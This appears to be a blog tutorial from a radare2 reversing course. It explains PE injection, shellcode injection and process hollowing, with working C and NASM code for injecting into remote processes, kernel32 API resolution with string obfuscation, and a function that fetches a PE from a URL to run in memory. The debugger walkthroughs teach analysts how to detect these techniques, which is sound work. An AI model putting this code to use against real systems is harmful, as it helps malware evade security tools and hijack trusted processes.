Here we go again! During the previous parts of the reversing with radare2 course we’ve been discussing DLL injection techniques, how they work, how to implement them and how to detect them in malware. Today we are moving one step forward to injection either shellcode or full executables into remote processes. PE/shellcode injection techniques work in a similar way as what we’ve seen though this time we’ll want to map and relocate a full executable (so several structures would need to be correctly mapped) or shellcode which won’t need any re-locating but will need to be correctly implemented to keep the remote program from breaking.
In a similar way as with DLL injection, the main goal for injecting malware code into a remote process is to abuse a legitimate application, trusted by the system to make it run our code thus hidding the malware execution. The legitimate application will run, it will be validated by the AV/EDR then the melicious code will be loaded in it and run. On the other hand we may want to inject code into a remote process in order to manipulate its memory, examplens on that may involve: credential stealing, game cheating or process disruption and overall sabotage among many others.
In this post we will examine very simple but fundamental code injection techniques such as PE injection, shellcode injection and process hollowing (also known as runPE).
About the PE structure
So, before we dive into those techniques we need to do a quick reminder about the PE structure. For that I strongly advise you to read this introduction to the PE format as a basic comprehension on this format is needed to properly understand the code implementation.
According to Wikipedia:
The Portable Executable (PE) format is a file format for executables, object code, DLLs and others used in 32-bit and 64-bit versions of Windows operating systems. The PE format is a data structure that encapsulates the information necessary for the Windows OS loader to manage the wrapped executable code. This includes dynamic library references for linking, API export and import tables, resource management data and thread-local storage (TLS) data. On NT operating systems, the PE format is used for EXE, DLL, SYS (device driver), MUI and other file types. The Unified Extensible Firmware Interface (UEFI) specification states that PE is the standard executable format in EFI environments.
Basically an EXE is written following the PE format, the writte file contains the code of the program (machine code), the data it needs to run but also several tables of data containing instructions to be used by the operating system to correctly place it in memory and linke the needed resources, such as librarires to it in order to use them.
The first bytes of a PE can be mapped to the following table:
typedef struct _IMAGE_DOS_HEADER {
USHORT e_magic;
USHORT e_cblp;
USHORT e_cp;
USHORT e_crlc;
USHORT e_cparhdr;
USHORT e_minalloc;
USHORT e_maxalloc;
USHORT e_ss;
USHORT e_sp;
USHORT e_csum;
USHORT e_ip;
USHORT e_cs;
USHORT e_lfarlc;
USHORT e_ovno;
USHORT e_res[4];
USHORT e_oemid;
USHORT e_oeminfo;
USHORT e_res2[10];
LONG e_lfanew;
For example, the e_magic field is the typical “MZ” you’ll see when debugging/disasembling an exe. And PE file header, which contains useful information about the program is located by indexing the e_lfanew field of the _IMAGE_DOS_HEADER.
And that one can be mapped to the following struct:
typedef struct _IMAGE_NT_HEADERS {
DWORD Signature;
Generally, the structure we are looking for in this table is the OptionalHeader which contains information such as the addresses where the program execution should be mapped and should start from, references to its sections and the size of the program in memory, all needed to map the program into memory and enable its execution. Each section in the PE will contain data needed for the program to run, .data will contain information not related to code, used for the program to run, .text will contain code, .rsrc may contain icons and .reloc will contain memory relocations
This is how it looks like:
typedef struct _IMAGE_OPTIONAL_HEADER {
WORD Magic;
BYTE MajorLinkerVersion;
BYTE MinorLinkerVersion;
DWORD SizeOfCode;
DWORD SizeOfInitializedData;
DWORD SizeOfUninitializedData;
DWORD AddressOfEntryPoint;
DWORD BaseOfCode;
DWORD BaseOfData;
DWORD ImageBase;
DWORD SectionAlignment;
DWORD FileAlignment;
WORD MajorOperatingSystemVersion;
WORD MinorOperatingSystemVersion;
WORD MajorImageVersion;
WORD MinorImageVersion;
WORD MajorSubsystemVersion;
WORD MinorSubsystemVersion;
DWORD Win32VersionValue;
DWORD SizeOfImage;
DWORD SizeOfHeaders;
DWORD CheckSum;
WORD Subsystem;
WORD DllCharacteristics;
DWORD SizeOfStackReserve;
DWORD SizeOfStackCommit;
DWORD SizeOfHeapReserve;
DWORD SizeOfHeapCommit;
DWORD LoaderFlags;
DWORD NumberOfRvaAndSizes;
In here, Sizeofimage contains the size of the program in memory once loaded, ImageBase the address where it should be starting from and AddressOfEntryPoint the address where it should start running from. Note that mapping is necessary because, as you see here, the program size will be different in disk than when loaded in memory! Also, its sections will get loaded at different places and will have different sizes than in disk. You can think about that in terms of compression/decompression, this is because of when in disk, the program data is consecutive, when in memory the program memory needs to be aligned, each section needs to be aligned to page boundary. But again, read about the PE format or watch a video. It can be very useful to play a little bit with software like PE BEAR once learning about that. *You may also wonder…why the base address is always at 0x00400000?
About Windows processes
When a program is launched, the OS creates a process, maps the PE into it using the structures we have seen sets and starts the process at the address indicated by the entry point. Each process will have its own process id, that can be used access it in order to pause it, read and write memory into it or manage threads. A process may contain multiple threads of execution that can be seen as sub processes but they are not. Each thread will have its own resources but share memory with the other ones. When we open a process using OpenProcess or create it using CreateProcessW, we’ll get a HANDLE that will be used as a reference for that process. The idea behind threading is precisely that, to share memory and run code in parallel. When it comes to hacking an attacker can create a thread in a remote process to execute shellcode there. As this post isn’t about windows processes Watch this video if you need it.
PE Injection
Back to business, the idea behind PE injection is to run an executable in the memory space of a legitimate process, to avoid detections. The technique will work as follows. First the attacker process will get its base address, then parse its own headers to get its size in memory by the SizeOfImage, then it will allocate a block of memory according to its size and copy itself there. This can also be done directly in the remote process. Then it will allocate a similar block of memory in the remote process in order to copy itself there. Then it will calculate the difference between its own BaseImage previously retrieved and the address of the allocated memory in the remote process, this will be done for patching memory references. Then it will use its relocation table (.reloc section) to patch all memory references (entries in that table) using the previously calculated difference, as when loading the relocation table will be used along with its image base address, but as the attacker is loading the PE in an address different than that we need to manually do the relocation ourselves, emulating the loader. Having done that the attacker writtes the PE and creates a remote thread on the target process, starting from the newly calculated base address + the entry point, and the program just runs.
An implementation of the technique can be found below, where the program maps into memory and starts its execution at the InjectionEntryPoint function.
// based on this
#include <stdio.h>
#include <Windows.h>
#include <tlhelp32.h>
typedef struct BASE_RELOCATION_ENTRY {
USHORT Offset : 12;
USHORT Type : 4;
/* This is the function that will get called
* once we map the PE in the remote process
DWORD InjectionEntryPoint()
CHAR moduleName[128] = "";
// the name of the PE
GetModuleFileNameA(NULL, moduleName, sizeof(moduleName));
MessageBoxA(NULL, moduleName, "Ssssssimple PE Injection", NULL);
return 0;
int main()
// information about the running processes
DWORD dwPid=0;
// Get current image's base address
PVOID imageBase = GetModuleHandle(NULL);
PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)imageBase + dosHeader->e_lfanew);
// Allocate a new memory block and copy the current PE image to this new memory block
PVOID localImage = VirtualAlloc(NULL, ntHeader->OptionalHeader.SizeOfImage, MEM_COMMIT, PAGE_READWRITE);
memcpy(localImage, imageBase, ntHeader->OptionalHeader.SizeOfImage);
// Search for the running processes
// create snapshot of system
hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(hSnap == INVALID_HANDLE_VALUE) return 0;
pe32.dwSize = sizeof(PROCESSENTRY32);
// get first process and loop
if(Process32First(hSnap, &pe32)){
do {
// check if it corresponds to notepad.exe
if (lstrcmpi("notepad.exe", pe32.szExeFile)==0) {
dwPid = pe32.th32ProcessID;
} while(Process32Next(hSnap, &pe32));
// return with error
return 1;
printf("[+] PID to inject in: %d \n",dwPid);
// Open the target process - this is process we will be injecting this PE into
HANDLE targetProcess = OpenProcess(MAXIMUM_ALLOWED, FALSE, dwPid);
// Allocate a new memory block in the target process. This is where we will be injecting this PE
PVOID targetImage = VirtualAllocEx(targetProcess, NULL, ntHeader->OptionalHeader.SizeOfImage, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Calculate delta between addresses of where the image will be located in the target process and where it's located currently
DWORD_PTR deltaImageBase = (DWORD_PTR)targetImage - (DWORD_PTR)imageBase;
// Relocate localImage, to ensure that it will have correct addresses once its in the target process
PIMAGE_BASE_RELOCATION relocationTable = (PIMAGE_BASE_RELOCATION)((DWORD_PTR)localImage + ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
DWORD relocationEntriesCount = 0;
PDWORD_PTR patchedAddress;
// we do the relocation manually ourselves!
// for each relocation block
while ((int) relocationTable->SizeOfBlock > 0)
relocationEntriesCount = (relocationTable->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(USHORT);
relocationRVA = (PBASE_RELOCATION_ENTRY)(relocationTable + 1);
// for each entry on the block
for (short i = 0; i < relocationEntriesCount; i++)
// is there an address to relocate?
if (relocationRVA[i].Offset)
// address to patch
patchedAddress = (PDWORD_PTR)((DWORD_PTR)localImage + relocationTable->VirtualAddress + relocationRVA[i].Offset);
// offset + delta
*patchedAddress += deltaImageBase;
// to the next relocation block
relocationTable = (PIMAGE_BASE_RELOCATION)((DWORD_PTR)relocationTable + relocationTable->SizeOfBlock);
// Write the relocated localImage into the target process
WriteProcessMemory(targetProcess, targetImage, localImage, ntHeader->OptionalHeader.SizeOfImage, NULL);
// Start the injected PE inside the target process
CreateRemoteThread(targetProcess, NULL, 0, (LPTHREAD_START_ROUTINE)((DWORD_PTR)InjectionEntryPoint + deltaImageBase), NULL, 0, NULL);
return 0;
Also note that when building executables, not all compilers will enable ASLR and thus create relocation tables (!). If you are using mingw as in Codeblocks in Windows, you’ll need to append this in order to have a reloc table and easily implement the technique. Otherwise you’ll need your program to load at the base address as defined in the PE.
And how to detect it in code?
In general terms and of course depending a lot on the obfuscation implemented this easy to catch. You’ll basically need to find a suspicious secuence of VirtuaAllocEx, WriteProcessMemory and CreateRemoteThread or its NT equivalents.
CreateToolHelp32SnapShot is always interesting to see in code:
Especially when it comes along with a loop browsing for processes and comparing them to specifically one.
Also the VirtualAllocEx called right after an OpenProcess should trigger an alarm:
And finally a WriteProcessMemory right before creating a thread.
When debugging we can simply put breakpoints in those:
[0x7ffe1f462630]> dcu entry0
Continue until 0x000214e0 using 1 bpsize
base addr should not be larger than the breakpoint address.
(5792) loading library at 0x00007FFE1F410000 (C:\Windows\System32\ntdll.dll) ntdll.dll
(5792) loading library at 0x00007FFE1E450000 (C:\Windows\System32\kernel32.dll) kernel32.dll
(5792) loading library at 0x00007FFE1CF20000 (C:\Windows\System32\KernelBase.dll) KernelBase.dll
(5792) loading library at 0x00007FFE19880000 (C:\Windows\System32\apphelp.dll) apphelp.dll
(5792) loading library at 0x00007FFE1D580000 (C:\Windows\System32\msvcrt.dll) msvcrt.dll
(5792) loading library at 0x00007FFE1EDB0000 (C:\Windows\System32\user32.dll) user32.dll
(5792) loading library at 0x00007FFE1D430000 (C:\Windows\System32\win32u.dll) win32u.dll
(5792) loading library at 0x00007FFE1D7A0000 (C:\Windows\System32\gdi32.dll) gdi32.dll
(5792) loading library at 0x00007FFE1D320000 (C:\Windows\System32\gdi32full.dll) gdi32full.dll
(5792) loading library at 0x00007FFE1CC40000 (C:\Windows\System32\msvcp_win.dll) msvcp_win.dll
(5792) loading library at 0x00007FFE1D1F0000 (C:\Windows\System32\ucrtbase.dll) ucrtbase.dll
Note that as we’ll see later on, it is also interesting to breakpoint their NT equivalent calls.
nth paddr vaddr bind type size lib name
1583 0x0003c080 0x7ffe1e48cc80 GLOBAL FUNC 0 KERNEL32.dll WriteProcessMemory
16 0x00081268 0x7ffe1e4d2868 NONE FUNC 0 api-ms-win-core-memory-l1-1-0.dll imp.WriteProcessMemory
[0x7ffe1f4e06b1]> dmi KERNEL32 CreateRemoteThread
nth paddr vaddr bind type size lib name
235 0x00039f20 0x7ffe1e48ab20 GLOBAL FUNC 0 KERNEL32.dll CreateRemoteThread
28 0x00081600 0x7ffe1e4d2c00 NONE FUNC 0 api-ms-win-core-processthreads-l1-1-0.dll imp.CreateRemoteThread
[0x7ffe1f4e06b1]> dmi KERNEL32 VirtualAllocEx
nth paddr vaddr bind type size lib name
1499 0x0003be20 0x7ffe1e48ca20 GLOBAL FUNC 0 KERNEL32.dll VirtualAllocEx
7 0x00081220 0x7ffe1e4d2820 NONE FUNC 0 api-ms-win-core-memory-l1-1-0.dll imp.VirtualAllocEx
[0x7ffe1f4e06b1]> dmi KERNEL32 OpenProcess
nth paddr vaddr bind type size lib name
1043 0x0001a1e0 0x7ffe1e46ade0 GLOBAL FUNC 0 KERNEL32.dll OpenProcess
1 0x00081668 0x7ffe1e4d2c68 NONE FUNC 0 api-ms-win-core-processthreads-l1-1-1.dll imp.OpenProcess
Another interesting point to take into account is to check for return values of OpenProcess and VirtuaAlloc calls, to note the process handles and the memory addresses used. Checking its status will simplify the analysis.
| 0x000215e8 b900000000 mov ecx, 0
| 0x000215ed 488b05b48c00. mov rax, qword [sym.imp.KERNEL32.dll_GetModuleHandleA] ; [0x2a2a8:8]=0x7ffe1e46f0b0
| 0x000215f4 ffd0 call rax
| ;-- rip:
| 0x000215f6 b 488985400100. mov qword [rbp + 0x140], rax
[0x000215c9]> dr rax
So as we see, calling GetModuleHandle without arguments returns the own base address.
| 0x00021632 89c0 mov eax, eax
| 0x00021634 41b904000000 mov r9d, 4
| 0x0002163a 41b800100000 mov r8d, 0x1000
| 0x00021640 4889c2 mov rdx, rax
| 0x00021643 b900000000 mov ecx, 0
| 0x00021648 488b05f18c00. mov rax, qword [sym.imp.KERNEL32.dll_VirtualAlloc] ; [0x2a340:8]=0x7ffe1e468500
| 0x0002164f ffd0 call rax
| ;-- rip:
| 0x00021651 b 488985280100. mov qword [rbp + 0x128], rax
[0x00021651]> dr rax
We can check that in memory, we’ll see that MZ.
[0x000216bc]> pxw 100 @ 0x00fc0000
0x00fc0000 0x00905a4d 0x00000003 0x00000004 0x0000ffff MZ..............
0x00fc0010 0x000000b8 0x00000000 0x00000040 0x00000000 ........@.......
0x00fc0020 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x00fc0030 0x00000000 0x00000000 0x00000000 0x00000080 ................
0x00fc0040 0x0eba1f0e 0xcd09b400 0x4c01b821 0x685421cd ........!..L.!Th
0x00fc0050 0x70207369 0x72676f72 0x63206d61 0x6f6e6e61 is program canno
0x00fc0060 0x65622074 t be
And at the same time we can move on and see how a SnapShot is called and processes are being listed:
[0x000216bc]> dr
rflags = 0x00000211
rax = 0x013ff6e0
rcx = 0x000000cc
rdx = 0x013ff6e0
rbx = 0x00000008
rsp = 0x013ff6a0
rbp = 0x013ff720
rsi = 0x00000023
rdi = 0x019914f0
[0x000216bc]> pxw 300 @ 0x013ff6e0
0x013ff6e0 0x00000130 0x00000000 0x00000000 0x00000000 0...............
0x013ff6f0 0x00000000 0x00000000 0x00000000 0x00000001 ................
0x013ff700 0x00000000 0x00000000 0x00000000 0x7379535b ............[Sys
0x013ff710 0x206d6574 0x636f7250 0x5d737365 0x00000000 tem Process]....
0x013ff720 0xffffffff 0xffffffff 0x14070013 0x00000000 ................
0x013ff730 0x01992d01 0x00000000 0x1f4cccc2 0x00007ffe .-........L.....
0x013ff740 0x01992dd0 0x00000000 0x1f54cd68 0x00007ffe .-......h.T.....
0x013ff750 0x01990000 0x00000000 0x00000018 0x00000000 ................
Finally, we can also inspect the VirtualAllocEx / WriteProcessMemory to see how it firstly creates a buffer in a remote process, and then it maps the executable into it:
[0x000217a9]> dr rax
[0x000217a9]> db 0x0002194d
[0x7ffe1f4b0861]> pxw @ 0x1a566060000
0x1a566060000 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x1a566060010 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x1a566060020 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x1a566060030 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x1a566060040 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x1a566060050 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x1a566060060 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x1a566060070 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x1a566060080 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x1a566060090 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x1a5660600a0 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x1a5660600b0 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x1a5660600c0 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x1a5660600d0 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x1a5660600e0 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x1a5660600f0 0x00000000 0x00000000 0x00000000 0x00000000 ................
[0x7ffe1f4b0861]> pxw @ 0x1a566060000
0x1a566060000 0x00905a4d 0x00000003 0x00000004 0x0000ffff MZ..............
0x1a566060010 0x000000b8 0x00000000 0x00000040 0x00000000 ........@.......
0x1a566060020 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x1a566060030 0x00000000 0x00000000 0x00000000 0x00000080 ................
0x1a566060040 0x0eba1f0e 0xcd09b400 0x4c01b821 0x685421cd ........!..L.!Th
0x1a566060050 0x70207369 0x72676f72 0x63206d61 0x6f6e6e61 is program canno
0x1a566060060 0x65622074 0x6e757220 0x206e6920 0x20534f44 t be run in DOS
0x1a566060070 0x65646f6d 0x0a0d0d2e 0x00000024 0x00000000 mode....$.......
0x1a566060080 0x00004550 0x00118664 0x630a4f06 0x0000dc00 PE..d....O.c....
0x1a566060090 0x00000533 0x002600f0 0x1e02020b 0x00002200 3.....&......"..
0x1a5660600a0 0x00004400 0x00000a00 0x000014e0 0x00001000 .D..............
Process Shellcode Injection
If we are using PE injection, we’ll need a compiled executble and we’ll have to manually map it, this has pros and cons. Another way to run code abusing a remote process is by performing shellcode injection. In this case, we won’t be injection a full PE, instead we will injection shellcode only that is, a set of instructions which will be position independent, so no relocation will need to be done!
The con of this one is that, as we want our code to be position independent to avoid any relocations, we won’t have any .data section so we’ll need to encode / embed our data manually in the shellcode and we’ll also need to resolve the API calls ourselves (we won’t have any dll resolved).
The main challenge will be to resolve those APIs. In a compiled and linked program we are free to call VirtualAlloc if we have imported Windows.h because the program will known the address of VirtualAlloc in kernel32.dll. Some shellcode running in a remote thread of a legitimate process won’t have access to that, even if the host process has kernel32 loaded into it, because the address of VirtualAlloc for example, may be different in each execution / each time the OS starts. As the shellcode comes from “outside” of the program, it won’t have any reference to that. So we’ll need to write some ASM that calculates the addresses of the needed API calls.
The following code will do that, you may get a lot of examples both for x32 and x64 by googling “resolve kernel32 shellcode”.
In general terms, the code will parse the address of the PEB which can be retrieved from a fixed location and then parse the ModuleList to retrieve the base address of the needed library (kernel32 in our case). Then routine will parse the library searching for the desired API call by its name. Generally speaking, we’ll only need to parse KERNEL32, mainly because LoadLibrary and GetProcessAddress are in it and can be used to load anything else we need.
The following code contains the shellcode we’ll inject into a remote process as an example, it will basically call WinExec to pop a calc.exe. Note that it is important to do some registry/stack saving / restoring before returning to the main thread! Or the program will crash.
; based on this one
; List of functions in kernel32
global WinMain
section .text
; we save the return address for later
; we should save the registers also...
pop r15
push r15
; Get kernel32.dll base address
; on an x64 syste, GS points to the TEB
; GS + 0x60 = PEB
; PEB_LDR_DATA -> Contains information about the loaded modules for the process.
xor rdi, rdi ; RDI = 0x0
mul rdi ; RAX&RDX =0x0
mov rbx, gs:[rax+0x60] ; RBX = Linear address of Process Environment Block (PEB)
mov rbx, [rbx+0x18] ; RBX = Address_of_LDR
mov rbx, [rbx+0x20] ; RBX = 1st entry in InitOrderModuleList / ntdll.dll
mov rbx, [rbx] ; RBX = 2nd entry in InitOrderModuleList / kernelbase.dll
mov rbx, [rbx] ; RBX = 3rd entry in InitOrderModuleList / kernel32.dll
mov rbx, [rbx+0x20] ; RBX = &kernel32.dll ( Base Address of kernel32.dll)
mov r8, rbx ; RBX & R8 = &kernel32.dll
; Get kernel32.dll ExportTable Address
mov ebx, [rbx+0x3C] ; RBX = Offset NewEXEHeader
add rbx, r8 ; RBX = &kernel32.dll + Offset NewEXEHeader = &NewEXEHeader
xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add
add cx, 0x88ff
shr rcx, 0x8 ; RCX = 0x88ff --> 0x88
mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable
add rdx, r8 ; RDX = &kernel32.dll + RVA ExportTable = &ExportTable
; Get &AddressTable from Kernel32.dll ExportTable
xor r10, r10
mov r10d, [rdx+0x1C] ; RDI = RVA AddressTable
add r10, r8 ; R10 = &AddressTable
; Get &NamePointerTable from Kernel32.dll ExportTable
xor r11, r11
mov r11d, [rdx+0x20] ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable
add r11, r8 ; R11 = &NamePointerTable (Memory Address of Kernel32.dll Export NamePointerTable)
; Get &OrdinalTable from Kernel32.dll ExportTable
xor r12, r12
mov r12d, [rdx+0x24] ; R12 = RVA OrdinalTable
add r12, r8 ; R12 = &OrdinalTable
jmp short apis
; Get the address of the API from the Kernel32.dll ExportTable
pop rbx ; save the return address for ret 2 caller after API address is found
pop rcx ; Get the string length counter from stack
xor rax, rax ; Setup Counter for resolving the API Address after finding the name string
mov rdx, rsp ; RDX = Address of API Name String to match on the Stack
push rcx ; push the string length counter to stack
mov rcx, [rsp] ; reset the string length counter from the stack
xor rdi,rdi ; Clear RDI for setting up string name retrieval
mov edi, [r11+rax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
add rdi, r8 ; RDI = &NameString = RVA NameString + &kernel32.dll
mov rsi, rdx ; RSI = Address of API Name String to match on the Stack (reset to start of string)
repe cmpsb ; Compare strings at RDI & RSI
je resolveaddr ; If match then we found the API string. Now we need to find the Address of the API
inc rax
jmp short loop
; Find the address of GetProcAddress by using the last value of the Counter
pop rcx ; remove string length counter from top of stack
mov ax, [r12+rax*2] ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of kernel32.<API>
mov eax, [r10+rax*4] ; RAX = RVA API = [&AddressTable + API OrdinalNumber]
add rax, r8 ; RAX = Kernel32.<API> = RVA kernel32.<API> + kernel32.dll BaseAddress
push rbx ; place the return address from the api string call back on the top of the stack
ret ; return to API caller
apis: ; API Names to resolve addresses
; WinExec | String length : 7
xor rcx, rcx
add cl, 0x7 ; String length for compare string
mov rax, 0x9C9A87BA9196A80F ; not 0x9C9A87BA9196A80F = 0xF0,WinExec
not rax ;mov rax, 0x636578456e6957F0 ; cexEniW,0xF0 : 636578456e6957F0 - Did Not to avoid WinExec returning from strings static analysis
shr rax, 0x8 ; xEcoll,0xFFFF --> 0x0000,xEcoll
push rax
push rcx ; push the string length counter to stack
call getapiaddr ; Get the address of the API from Kernel32.dll ExportTable
mov r14, rax ; R14 = Kernel32.WinExec Address
; UINT WinExec(
; LPCSTR lpCmdLine, => RCX = "calc.exe",0x0
; UINT uCmdShow => RDX = 0x1 = SW_SHOWNORMAL
; );
xor rcx, rcx
mul rcx ; RAX & RDX & RCX = 0x0
; calc.exe | String length : 8
push rax ; Null terminate string on stack
mov rax, 0x9A879AD19C939E9C ; not 0x9A879AD19C939E9C = "calc.exe"
not rax
;mov rax, 0x6578652e636c6163 ; exe.clac : 6578652e636c6163
push rax ; RSP = "calc.exe",0x0
mov rcx, rsp ; RCX = "calc.exe",0x0
inc rdx ; RDX = 0x1 = SW_SHOWNORMAL
sub rsp, 0x20 ; WinExec clobbers first 0x20 bytes of stack (Overwrites our command string when proxied to CreatProcessA)
call r14 ; Call WinExec("calc.exe", SW_HIDE)
push r15
Also note that, by this same system, we can load any API reference we want:
; Maybe playing with SuspendThread(GetCurrentThread()); could be interesting :)
; Get Sleep to r15 | String length : 10
xor rcx, rcx
add cl, 0x5 ; size = 14
mov rax, 0x7065656C53FFFFFF; dae, fffff
shr rax, 0x18 ; F's to 0's. FF FF = 2 bytes = 16 bits = 0xF bits
push rax
push rcx
call getapiaddr
mov r15, rax
mov rcx, 0xFFFFFFFFFFFFFFFF ; infinite = 00000000FFFFFFFF
shr rcx, 0x18
call r15
And we can compile that into an object by using NASM. Then we can use any script or regex we want to extract the shellcode:
nasm.exe -fwin64 .\resolvecalc.asm
objdump.exe -d .\resolvecalc.obj | python .\
Where can be found here
And if what we want is to generate a standalone executable from it we can use:
gcc.exe .\resolvecalc.obj -o rcalc.exe -mconsole (or -mwindows etc)
Find more compiler flags here
The final shellcode injection PoC will look like this:
#include "Windows.h"
int main(int argc, char *argv[])
unsigned char shellcode[] =
HANDLE processHandle;
HANDLE remoteThread;
PVOID remoteBuffer;
processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, (DWORD) 10168);
int id = 0 ;
remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
remoteThread = CreateRemoteThread(processHandle, NULL, 100, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
return 0;
When analysing it in radare2, the following should trigger an alert:
An OpenProcess… OK but also a reference to a strange position:
As we see, the shellcode can be examined very easily in radare2/Cutter/Iaito!!
And if we look at it closely, we can easily detect a string being loaded using the registers/stack:
The process is similar from the debugger point of view:
0x0040156d e8ee010000 call sym.__main
| 0x00401572 488d45d0 lea rax, [var_30h]
| 0x00401576 488d158b2a00. lea rdx, str.A_AWH1 ; 0x404008 ; "A_AWH1\xffH\xf7\xe7eH\x8bX`H\x8b[\x18H\x8b[ H\x8b\x1bH\x8b\x1bH\x8b[ I\x89\u060b[<L\x01\xc3H1\xc9f\x81\xc1\xff\x88H\xc1\xe9\b\x8b\x14\vL\x01\xc2M1\xd2D\x8bR\x1cM\x01\xc2M1\xdbD\x8bZ M\x01\xc3M1\xe4D\x8bb$M\x01\xc4\xeb2[YH1\xc0H\x89\xe2QH\x8b\f$H1\xffA\x8b<\x83L\x01\xc7H\x89\xd6\xf3\xa6t\x05H\xff\xc0\xeb\xe6YfA\x8b\x04DA\x8b\x04\x82L\x01\xc0S\xc3H1\u0240\xc1\aH\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9cH\xf7\xd0H\xc1\xe8\bPQ\xe8\xb0\xff\xff\xffI\x89\xc6H1\xc9H\xf7\xe1PH\xb8\x9c\x9e\x93\x9c\u045a\x87\x9aH\xf7\xd0PH\x89\xe1H\xff\xc2H\x83\xec A\xff\xd6AW\xc3"
| 0x0040157d b9d5000000 mov ecx, 0xd5 ; 213
| 0x00401582 4989c8 mov r8, rcx
| 0x00401585 4889c1 mov rcx, rax
We can also inspect the shellcode:
[0x00401550]> pd @ str.A_AWH1
;-- str.A_AWH1:
; DATA XREF from dbg.main @ 0x401576
0x00404008 .string "A_AWH1" ; len=7
0x0040400f 48f7e7 mul rdi
0x00404012 65488b5860 mov rbx, qword gs:[rax + 0x60]
0x00404017 488b5b18 mov rbx, qword [rbx + 0x18]
0x0040401b 488b5b20 mov rbx, qword [rbx + 0x20]
0x0040401f 488b1b mov rbx, qword [rbx]
0x00404022 488b1b mov rbx, qword [rbx]
0x00404025 488b5b20 mov rbx, qword [rbx + 0x20]
0x00404029 ~ 4989d8 mov r8, rbx
;-- str.__L:
0x0040402b .string "\xd8\x8b[<L" ; len=6
0x00404031 c3 ret
0x00404032 4831c9 xor rcx, rcx
And we can move to debug the host process, note the address after the VirtualAllocEx and set breakpoints in it to continue the execution:
(5668) Created thread 6048 (start @ 00007FFE1F4DC940) (teb @ 000000A37A525000)
(5668) Created thread 5432 (start @ 000001A566040000) (teb @ 000000A37A527000)
hit breakpoint at: 0x1a566040000
[0x1a566040000]> pd 10
;-- rax:
;-- rdx:
;-- r9:
;-- rip:
0x1a566040000 b 005f41 add byte [rdi + 0x41], bl
0x1a566040003 57 push rdi
wa nop
We will see the shellcode being written and the execution being started there:
[0x1a566040001]> ds
[0x1a566040001]> pd 10
0x1a566040001 5f pop rdi
;-- rip:
0x1a566040002 4157 push r15
And after some steps, we will see the KERNEL32 being resolved:
0x1a56604001d 488b5b20 mov rbx, qword [rbx + 0x20]
;-- rip:
0x1a566040021 b 4989d8 mov r8, rbx
0x1a566040024 8b5b3c mov ebx, dword [rbx + 0x3c]
Examining the memory after the pertinent call, we will see the base address in rax:
[0x1a566040001]> dr rbx
0x00007ffe1e450000 - 0x00007ffe1e451000 - usr 4K s r-- IMAGE KERNEL32.DLL ? ; rbx
0x00007ffe1e451000 - 0x00007ffe1e4d0000 - usr 508K s r-x IMAGE KERNEL32.DLL | .text ? ; map.IMAGE____KERNEL32.DLL__.text.r_x
[0x1a566040001]> pxw @ 0x7ffe1e450000
0x7ffe1e450000 0x00905a4d 0x00000003 0x00000004 0x0000ffff MZ..............
0x7ffe1e450010 0x000000b8 0x00000000 0x00000040 0x00000000 ........@.......
0x7ffe1e450020 0x00000000 0x00000000 0x00000000 0x00000000 ................
And after then, we will see the string being decoded and pushed in the stack:
0x1a566040094 48b80fa89691. movabs rax, 0x9c9a87ba9196a80f
0x1a56604009e 48f7d0 not rax
0x1a5660400a1 48c1e808 shr rax, 8
0x1a5660400a5 50 push rax
[0x1a566040001]> dc
hit breakpoint at: 0x1a5660400a6
[0x1a5660400a6]> pxw @ rsp
0xa37a77fb40 0x456e6957 0x00636578 0x00000000 0x00000000 WinExec.........
0xa37a77fb50 0x00000000 0x00000000 0x00000000 0x00000000 ................
Process Hollowing
Process hollowing follows a similar philosophy as what we have previously seen. Instead of mapping an executable into a remote process that is already RUNNING, the attacker CREATES a process in a suspended state, deletes its content, writes the malicious content into it, sets the entry point to the malicious code’s entry point and resumes the execution from there. It basically creates a process, “hollows it” and then substitutes its content by of the malware, again forcing a legitimate process to run evil code. Usually you’ll see a malware abusing processes such as svchost.exe, explorer.exe and the like…
Get file byes from URL
So one of the strategies used by common malware when implementing process hollowing or more elaborated but similar techniques is to drop the initial stage of the malware on the system as an simpler program that will get the real malware from some url, for example load it in memory (ram) and then implement process hollowing writting and running the retrieved malware directly into a legitimate process withouth having that malicious code touching disk.
The full code for the following example can be found here
This can be tested locally by using python to implement a simple web server:
python3 -m http.server 8080
An example of a function getting those PE bytes from an url can be found here:
LVOID GetFileContentFromUrl(const LPSTR fileUrl)
//Download from
HINTERNET hInternetSession;
int fSize = 0;
DWORD dwBytesRead=0;
DWORD lpOutBuffer=0;
DWORD dwSize=sizeof(lpOutBuffer);
